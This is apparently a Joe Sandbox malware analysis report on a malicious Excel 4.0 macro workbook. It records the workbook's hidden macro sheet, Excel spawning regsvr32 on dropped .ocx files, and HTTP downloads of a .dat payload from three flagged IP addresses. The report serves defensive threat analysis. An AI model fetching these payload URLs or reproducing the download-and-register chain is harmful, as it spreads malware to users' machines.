Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
Summary-313689350-Feb-15.xlsb

Overview

General Information

Sample Name:Summary-313689350-Feb-15.xlsb
Analysis ID:572924
MD5:494a7ce828bec65273a9b49cefea91d7
SHA1:dfab2f0d4759820ef1a769bbaa2d79b64218b7c9
SHA256:e0b0146bdaabe240d92056c5b211e0b2d858f81aade2e06ca28f59bc2a229bed
Infos:

Detection

Hidden Macro 4.0
Score:80
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Office document tries to convince victim to disable security protection (e.g. to enable ActiveX or Macros)
Antivirus detection for URL or domain
Found malicious Excel 4.0 Macro
Found Excel 4.0 Macro with suspicious formulas
Sigma detected: Microsoft Office Product Spawning Windows Shell
Document exploit detected (process start blacklist hit)
Document exploit detected (UrlDownloadToFile)
Found a hidden Excel 4.0 Macro sheet
Potential document exploit detected (unknown TCP traffic)
Tries to load missing DLLs
Uses a known web browser user agent for HTTP communication
Yara detected Xls With Macro 4.0
Sigma detected: Excel Network Connections
Potential document exploit detected (performs HTTP gets)
Document misses a certain OLE stream usually present in this Microsoft Office document type

Classification

  • System is w10x64
  • EXCEL.EXE (PID: 7044 cmdline: "C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE" /automation -Embedding MD5: 5D6638F2C8F8571C593999C58866007E)
    • regsvr32.exe (PID: 6016 cmdline: regsvr32 C:\ProgramData\Hroser1.ocx MD5: 426E7499F6A7346F0410DEAD0805586B)
    • regsvr32.exe (PID: 5076 cmdline: regsvr32 C:\ProgramData\Hroser2.ocx MD5: 426E7499F6A7346F0410DEAD0805586B)
    • regsvr32.exe (PID: 5552 cmdline: regsvr32 C:\ProgramData\Hroser3.ocx MD5: 426E7499F6A7346F0410DEAD0805586B)
  • cleanup
No configs have been found
SourceRuleDescriptionAuthorStrings
app.xmlJoeSecurity_XlsWithMacro4Yara detected Xls With Macro 4.0Joe Security

    System Summary

    barindex
    Source: Process startedAuthor: Michael Haag, Florian Roth, Markus Neis, Elastic, FPT.EagleEye Team: Data: Command: regsvr32 C:\ProgramData\Hroser1.ocx, CommandLine: regsvr32 C:\ProgramData\Hroser1.ocx, CommandLine|base64offset|contains: ,, Image: C:\Windows\SysWOW64\regsvr32.exe, NewProcessName: C:\Windows\SysWOW64\regsvr32.exe, OriginalFileName: C:\Windows\SysWOW64\regsvr32.exe, ParentCommandLine: "C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE" /automation -Embedding, ParentImage: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE, ParentProcessId: 7044, ProcessCommandLine: regsvr32 C:\ProgramData\Hroser1.ocx, ProcessId: 6016
    Source: Network ConnectionAuthor: Christopher Peacock '@securepeacock', SCYTHE '@scythe_io', Florian Roth '@Neo23x0": Data: DestinationIp: 185.141.26.236, DestinationIsIpv6: false, DestinationPort: 80, EventID: 3, Image: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE, Initiated: true, ProcessId: 7044, Protocol: tcp, SourceIp: 192.168.2.3, SourceIsIpv6: false, SourcePort: 49760

    Click to jump to signature section

    Show All Signature Results

    AV Detection

    barindex
    Source: http://185.141.26.236/5679372910751440.datAvira URL Cloud: Label: malware
    Source: http://185.252.215.41/5679372910751440.datAvira URL Cloud: Label: malware
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEFile opened: C:\Windows\SysWOW64\MSVCR100.dllJump to behavior

    Software Vulnerabilities

    barindex
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess created: C:\Windows\SysWOW64\regsvr32.exe
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXESection loaded: unknown origin: URLDownloadToFileAJump to behavior
    Source: global trafficTCP traffic: 192.168.2.3:49760 -> 185.141.26.236:80
    Source: global trafficTCP traffic: 192.168.2.3:49760 -> 185.141.26.236:80
    Source: global trafficHTTP traffic detected: GET /5679372910751440.dat HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: 185.141.26.236Connection: Keep-Alive
    Source: global trafficHTTP traffic detected: GET /5679372910751440.dat HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: 185.252.215.41Connection: Keep-Alive
    Source: global trafficHTTP traffic detected: GET /5679372910751440.dat HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: 188.165.62.32Connection: Keep-Alive
    Source: unknownTCP traffic detected without corresponding DNS query: 185.141.26.236
    Source: unknownTCP traffic detected without corresponding DNS query: 185.141.26.236
    Source: unknownTCP traffic detected without corresponding DNS query: 185.141.26.236
    Source: unknownTCP traffic detected without corresponding DNS query: 185.141.26.236
    Source: unknownTCP traffic detected without corresponding DNS query: 185.252.215.41
    Source: unknownTCP traffic detected without corresponding DNS query: 185.252.215.41
    Source: unknownTCP traffic detected without corresponding DNS query: 185.252.215.41
    Source: unknownTCP traffic detected without corresponding DNS query: 185.252.215.41
    Source: unknownTCP traffic detected without corresponding DNS query: 188.165.62.32
    Source: unknownTCP traffic detected without corresponding DNS query: 188.165.62.32
    Source: unknownTCP traffic detected without corresponding DNS query: 188.165.62.32
    Source: unknownTCP traffic detected without corresponding DNS query: 188.165.62.32
    Source: unknownTCP traffic detected without corresponding DNS query: 185.141.26.236
    Source: unknownTCP traffic detected without corresponding DNS query: 185.252.215.41
    Source: unknownTCP traffic detected without corresponding DNS query: 188.165.62.32
    Source: unknownTCP traffic detected without corresponding DNS query: 188.165.62.32
    Source: unknownTCP traffic detected without corresponding DNS query: 185.252.215.41
    Source: unknownTCP traffic detected without corresponding DNS query: 185.141.26.236
    Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenServer: nginxDate: Tue, 15 Feb 2022 22:01:05 GMTContent-Type: text/htmlContent-Length: 548Connection: keep-aliveData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a Data Ascii: <html><head><title>403 Forbidden</title></head><body><center><h1>403 Forbidden</h1></center><hr><center>nginx</center></body></html><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page -->
    Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenServer: nginxDate: Tue, 15 Feb 2022 22:00:24 GMTContent-Type: text/htmlContent-Length: 548Connection: keep-aliveData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a Data Ascii: <html><head><title>403 Forbidden</title></head><body><center><h1>403 Forbidden</h1></center><hr><center>nginx</center></body></html><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page -->
    Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenServer: nginxDate: Tue, 15 Feb 2022 22:00:25 GMTContent-Type: text/htmlContent-Length: 548Connection: keep-aliveData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a Data Ascii: <html><head><title>403 Forbidden</title></head><body><center><h1>403 Forbidden</h1></center><hr><center>nginx</center></body></html><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page -->
    Source: FCEFC64E-A4ED-4957-8E69-56519943E108.0.drString found in binary or memory: http://olkflt.edog.officeapps.live.com/olkflt/outlookflighting.svc/api/glides
    Source: FCEFC64E-A4ED-4957-8E69-56519943E108.0.drString found in binary or memory: http://weather.service.msn.com/data.aspx
    Source: FCEFC64E-A4ED-4957-8E69-56519943E108.0.drString found in binary or memory: https://addinsinstallation.store.office.com/app/acquisitionlogging
    Source: FCEFC64E-A4ED-4957-8E69-56519943E108.0.drString found in binary or memory: https://addinsinstallation.store.office.com/app/download
    Source: FCEFC64E-A4ED-4957-8E69-56519943E108.0.drString found in binary or memory: https://addinsinstallation.store.office.com/appinstall/authenticated
    Source: FCEFC64E-A4ED-4957-8E69-56519943E108.0.drString found in binary or memory: https://addinsinstallation.store.office.com/appinstall/preinstalled
    Source: FCEFC64E-A4ED-4957-8E69-56519943E108.0.drString found in binary or memory: https://addinsinstallation.store.office.com/appinstall/unauthenticated
    Source: FCEFC64E-A4ED-4957-8E69-56519943E108.0.drString found in binary or memory: https://addinsinstallation.store.office.com/orgid/appinstall/authenticated
    Source: FCEFC64E-A4ED-4957-8E69-56519943E108.0.drString found in binary or memory: https://addinslicensing.store.office.com/apps/remove
    Source: FCEFC64E-A4ED-4957-8E69-56519943E108.0.drString found in binary or memory: https://addinslicensing.store.office.com/commerce/query
    Source: FCEFC64E-A4ED-4957-8E69-56519943E108.0.drString found in binary or memory: https://addinslicensing.store.office.com/entitlement/query
    Source: FCEFC64E-A4ED-4957-8E69-56519943E108.0.drString found in binary or memory: https://addinslicensing.store.office.com/orgid/apps/remove
    Source: FCEFC64E-A4ED-4957-8E69-56519943E108.0.drString found in binary or memory: https://addinslicensing.store.office.com/orgid/entitlement/query
    Source: FCEFC64E-A4ED-4957-8E69-56519943E108.0.drString found in binary or memory: https://analysis.windows.net/powerbi/api
    Source: FCEFC64E-A4ED-4957-8E69-56519943E108.0.drString found in binary or memory: https://apc.learningtools.onenote.com/learningtoolsapi/v2.0/getfreeformspeech
    Source: FCEFC64E-A4ED-4957-8E69-56519943E108.0.drString found in binary or memory: https://api.aadrm.com
    Source: FCEFC64E-A4ED-4957-8E69-56519943E108.0.drString found in binary or memory: https://api.aadrm.com/
    Source: FCEFC64E-A4ED-4957-8E69-56519943E108.0.drString found in binary or memory: https://api.addins.omex.office.net/appinfo/query
    Source: FCEFC64E-A4ED-4957-8E69-56519943E108.0.drString found in binary or memory: https://api.addins.omex.office.net/appstate/query
    Source: FCEFC64E-A4ED-4957-8E69-56519943E108.0.drString found in binary or memory: https://api.addins.store.office.com/addinstemplate
    Source: FCEFC64E-A4ED-4957-8E69-56519943E108.0.drString found in binary or memory: https://api.addins.store.office.com/app/query
    Source: FCEFC64E-A4ED-4957-8E69-56519943E108.0.drString found in binary or memory: https://api.addins.store.officeppe.com/addinstemplate
    Source: FCEFC64E-A4ED-4957-8E69-56519943E108.0.drString found in binary or memory: https://api.cortana.ai
    Source: FCEFC64E-A4ED-4957-8E69-56519943E108.0.drString found in binary or memory: https://api.diagnostics.office.com
    Source: FCEFC64E-A4ED-4957-8E69-56519943E108.0.drString found in binary or memory: https://api.diagnosticssdf.office.com
    Source: FCEFC64E-A4ED-4957-8E69-56519943E108.0.drString found in binary or memory: https://api.diagnosticssdf.office.com/v2/feedback
    Source: FCEFC64E-A4ED-4957-8E69-56519943E108.0.drString found in binary or memory: https://api.diagnosticssdf.office.com/v2/file
    Source: FCEFC64E-A4ED-4957-8E69-56519943E108.0.drString found in binary or memory: https://api.microsoftstream.com/api/
    Source: FCEFC64E-A4ED-4957-8E69-56519943E108.0.drString found in binary or memory: https://api.office.net
    Source: FCEFC64E-A4ED-4957-8E69-56519943E108.0.drString found in binary or memory: https://api.onedrive.com
    Source: FCEFC64E-A4ED-4957-8E69-56519943E108.0.drString found in binary or memory: https://api.powerbi.com/beta/myorg/imports
    Source: FCEFC64E-A4ED-4957-8E69-56519943E108.0.drString found in binary or memory: https://api.powerbi.com/v1.0/myorg/datasets
    Source: FCEFC64E-A4ED-4957-8E69-56519943E108.0.drString found in binary or memory: https://api.powerbi.com/v1.0/myorg/groups
    Source: FCEFC64E-A4ED-4957-8E69-56519943E108.0.drString found in binary or memory: https://apis.live.net/v5.0/
    Source: FCEFC64E-A4ED-4957-8E69-56519943E108.0.drString found in binary or memory: https://arc.msn.com/v4/api/selection
    Source: FCEFC64E-A4ED-4957-8E69-56519943E108.0.drString found in binary or memory: https://asgsmsproxyapi.azurewebsites.net/
    Source: FCEFC64E-A4ED-4957-8E69-56519943E108.0.drString found in binary or memory: https://augloop.office.com
    Source: FCEFC64E-A4ED-4957-8E69-56519943E108.0.drString found in binary or memory: https://augloop.office.com/v2
    Source: FCEFC64E-A4ED-4957-8E69-56519943E108.0.drString found in binary or memory: https://augloop.office.com;https://augloop-int.officeppe.com;https://augloop-dogfood.officeppe.com;h
    Source: FCEFC64E-A4ED-4957-8E69-56519943E108.0.drString found in binary or memory: https://autodiscover-s.outlook.com/
    Source: FCEFC64E-A4ED-4957-8E69-56519943E108.0.drString found in binary or memory: https://autodiscover-s.outlook.com/autodiscover/autodiscover.xml
    Source: FCEFC64E-A4ED-4957-8E69-56519943E108.0.drString found in binary or memory: https://cdn.entity.
    Source: FCEFC64E-A4ED-4957-8E69-56519943E108.0.drString found in binary or memory: https://cdn.odc.officeapps.live.com/odc/stat/images/OneDriveUpsell.png
    Source: FCEFC64E-A4ED-4957-8E69-56519943E108.0.drString found in binary or memory: https://cdn.odc.officeapps.live.com/odc/xml?resource=OneDriveSignUpUpsell
    Source: FCEFC64E-A4ED-4957-8E69-56519943E108.0.drString found in binary or memory: https://cdn.odc.officeapps.live.com/odc/xml?resource=OneDriveSyncClientUpsell
    Source: FCEFC64E-A4ED-4957-8E69-56519943E108.0.drString found in binary or memory: https://client-office365-tas.msedge.net/ab
    Source: FCEFC64E-A4ED-4957-8E69-56519943E108.0.drString found in binary or memory: https://clients.config.office.net/
    Source: FCEFC64E-A4ED-4957-8E69-56519943E108.0.drString found in binary or memory: https://clients.config.office.net/user/v1.0/android/policies
    Source: FCEFC64E-A4ED-4957-8E69-56519943E108.0.drString found in binary or memory: https://clients.config.office.net/user/v1.0/ios
    Source: FCEFC64E-A4ED-4957-8E69-56519943E108.0.drString found in binary or memory: https://clients.config.office.net/user/v1.0/mac
    Source: FCEFC64E-A4ED-4957-8E69-56519943E108.0.drString found in binary or memory: https://clients.config.office.net/user/v1.0/tenantassociationkey
    Source: FCEFC64E-A4ED-4957-8E69-56519943E108.0.drString found in binary or memory: https://cloudfiles.onenote.com/upload.aspx
    Source: FCEFC64E-A4ED-4957-8E69-56519943E108.0.drString found in binary or memory: https://config.edge.skype.com
    Source: FCEFC64E-A4ED-4957-8E69-56519943E108.0.drString found in binary or memory: https://config.edge.skype.com/config/v1/Office
    Source: FCEFC64E-A4ED-4957-8E69-56519943E108.0.drString found in binary or memory: https://config.edge.skype.com/config/v2/Office
    Source: FCEFC64E-A4ED-4957-8E69-56519943E108.0.drString found in binary or memory: https://cortana.ai
    Source: FCEFC64E-A4ED-4957-8E69-56519943E108.0.drString found in binary or memory: https://cortana.ai/api
    Source: FCEFC64E-A4ED-4957-8E69-56519943E108.0.drString found in binary or memory: https://cr.office.com
    Source: FCEFC64E-A4ED-4957-8E69-56519943E108.0.drString found in binary or memory: https://dataservice.o365filtering.com
    Source: FCEFC64E-A4ED-4957-8E69-56519943E108.0.drString found in binary or memory: https://dataservice.o365filtering.com/
    Source: FCEFC64E-A4ED-4957-8E69-56519943E108.0.drString found in binary or memory: https://dataservice.o365filtering.com/PolicySync/PolicySync.svc/SyncFile
    Source: FCEFC64E-A4ED-4957-8E69-56519943E108.0.drString found in binary or memory: https://dataservice.protection.outlook.com/PolicySync/PolicySync.svc/SyncFile
    Source: FCEFC64E-A4ED-4957-8E69-56519943E108.0.drString found in binary or memory: https://dataservice.protection.outlook.com/PsorWebService/v1/ClientSyncFile/MipPolicies
    Source: FCEFC64E-A4ED-4957-8E69-56519943E108.0.drString found in binary or memory: https://dev.cortana.ai
    Source: FCEFC64E-A4ED-4957-8E69-56519943E108.0.drString found in binary or memory: https://dev.virtualearth.net/REST/V1/GeospatialEndpoint/
    Source: FCEFC64E-A4ED-4957-8E69-56519943E108.0.drString found in binary or memory: https://dev0-api.acompli.net/autodetect
    Source: FCEFC64E-A4ED-4957-8E69-56519943E108.0.drString found in binary or memory: https://devnull.onenote.com
    Source: FCEFC64E-A4ED-4957-8E69-56519943E108.0.drString found in binary or memory: https://directory.services.
    Source: FCEFC64E-A4ED-4957-8E69-56519943E108.0.drString found in binary or memory: https://ecs.office.com/config/v2/Office
    Source: FCEFC64E-A4ED-4957-8E69-56519943E108.0.drString found in binary or memory: https://edu-mathreco-prod.trafficmanager.net
    Source: FCEFC64E-A4ED-4957-8E69-56519943E108.0.drString found in binary or memory: https://edu-mathreco-prod.trafficmanager.net/MathRecognizer.Recognize
    Source: FCEFC64E-A4ED-4957-8E69-56519943E108.0.drString found in binary or memory: https://edu-mathsolver-prod.trafficmanager.net
    Source: FCEFC64E-A4ED-4957-8E69-56519943E108.0.drString found in binary or memory: https://edu-mathsolver-prod.trafficmanager.net/MathSolver.Solve
    Source: FCEFC64E-A4ED-4957-8E69-56519943E108.0.drString found in binary or memory: https://enrichment.osi.office.net/
    Source: FCEFC64E-A4ED-4957-8E69-56519943E108.0.drString found in binary or memory: https://enrichment.osi.office.net/OfficeEnrichment/Refresh/v1
    Source: FCEFC64E-A4ED-4957-8E69-56519943E108.0.drString found in binary or memory: https://enrichment.osi.office.net/OfficeEnrichment/Resolve/v1
    Source: FCEFC64E-A4ED-4957-8E69-56519943E108.0.drString found in binary or memory: https://enrichment.osi.office.net/OfficeEnrichment/Search/v1
    Source: FCEFC64E-A4ED-4957-8E69-56519943E108.0.drString found in binary or memory: https://enrichment.osi.office.net/OfficeEnrichment/StockHistory/v1
    Source: FCEFC64E-A4ED-4957-8E69-56519943E108.0.drString found in binary or memory: https://enrichment.osi.office.net/OfficeEnrichment/ipcheck/v1
    Source: FCEFC64E-A4ED-4957-8E69-56519943E108.0.drString found in binary or memory: https://enrichment.osi.office.net/OfficeEnrichment/web/Metadata/
    Source: FCEFC64E-A4ED-4957-8E69-56519943E108.0.drString found in binary or memory: https://enrichment.osi.office.net/OfficeEnrichment/web/Metadata/metadata.json
    Source: FCEFC64E-A4ED-4957-8E69-56519943E108.0.drString found in binary or memory: https://enrichment.osi.office.net/OfficeEnrichment/web/view/desktop/main.cshtml
    Source: FCEFC64E-A4ED-4957-8E69-56519943E108.0.drString found in binary or memory: https://enrichment.osi.office.net/OfficeEnrichment/web/view/web/main.cshtml
    Source: FCEFC64E-A4ED-4957-8E69-56519943E108.0.drString found in binary or memory: https://entitlement.diagnostics.office.com
    Source: FCEFC64E-A4ED-4957-8E69-56519943E108.0.drString found in binary or memory: https://entitlement.diagnosticssdf.office.com
    Source: FCEFC64E-A4ED-4957-8E69-56519943E108.0.drString found in binary or memory: https://eur.learningtools.onenote.com/learningtoolsapi/v2.0/getfreeformspeech
    Source: FCEFC64E-A4ED-4957-8E69-56519943E108.0.drString found in binary or memory: https://excel.uservoice.com/forums/304936-excel-for-mobile-devices-tablets-phones-android
    Source: FCEFC64E-A4ED-4957-8E69-56519943E108.0.drString found in binary or memory: https://globaldisco.crm.dynamics.com
    Source: FCEFC64E-A4ED-4957-8E69-56519943E108.0.drString found in binary or memory: https://graph.ppe.windows.net
    Source: FCEFC64E-A4ED-4957-8E69-56519943E108.0.drString found in binary or memory: https://graph.ppe.windows.net/
    Source: FCEFC64E-A4ED-4957-8E69-56519943E108.0.drString found in binary or memory: https://graph.windows.net
    Source: FCEFC64E-A4ED-4957-8E69-56519943E108.0.drString found in binary or memory: https://graph.windows.net/
    Source: FCEFC64E-A4ED-4957-8E69-56519943E108.0.drString found in binary or memory: https://hubblecontent.osi.office.net/contentsvc/api/telemetry
    Source: FCEFC64E-A4ED-4957-8E69-56519943E108.0.drString found in binary or memory: https://hubblecontent.osi.office.net/contentsvc/browse?
    Source: FCEFC64E-A4ED-4957-8E69-56519943E108.0.drString found in binary or memory: https://hubblecontent.osi.office.net/contentsvc/browse?cp=remix3d
    Source: FCEFC64E-A4ED-4957-8E69-56519943E108.0.drString found in binary or memory: https://hubblecontent.osi.office.net/contentsvc/microsoftcontent?initpivot=icons&amp;premium=1
    Source: FCEFC64E-A4ED-4957-8E69-56519943E108.0.drString found in binary or memory: https://hubblecontent.osi.office.net/contentsvc/microsoftcontent?initpivot=stockimages&amp;premium=1
    Source: FCEFC64E-A4ED-4957-8E69-56519943E108.0.drString found in binary or memory: https://hubblecontent.osi.office.net/contentsvc/microsoftcontent?initpivot=stockvideos&amp;premium=1
    Source: FCEFC64E-A4ED-4957-8E69-56519943E108.0.drString found in binary or memory: https://hubblecontent.osi.office.net/contentsvc/microsofticon?
    Source: FCEFC64E-A4ED-4957-8E69-56519943E108.0.drString found in binary or memory: https://incidents.diagnostics.office.com
    Source: FCEFC64E-A4ED-4957-8E69-56519943E108.0.drString found in binary or memory: https://incidents.diagnosticssdf.office.com
    Source: FCEFC64E-A4ED-4957-8E69-56519943E108.0.drString found in binary or memory: https://inclient.store.office.com/gyro/client
    Source: FCEFC64E-A4ED-4957-8E69-56519943E108.0.drString found in binary or memory: https://inclient.store.office.com/gyro/clientstore
    Source: FCEFC64E-A4ED-4957-8E69-56519943E108.0.drString found in binary or memory: https://insertmedia.bing.office.net/images/hosted?host=office&amp;adlt=strict&amp;hostType=Immersive
    Source: FCEFC64E-A4ED-4957-8E69-56519943E108.0.drString found in binary or memory: https://insertmedia.bing.office.net/images/officeonlinecontent/browse?cp=Bing
    Source: FCEFC64E-A4ED-4957-8E69-56519943E108.0.drString found in binary or memory: https://insertmedia.bing.office.net/images/officeonlinecontent/browse?cp=ClipArt
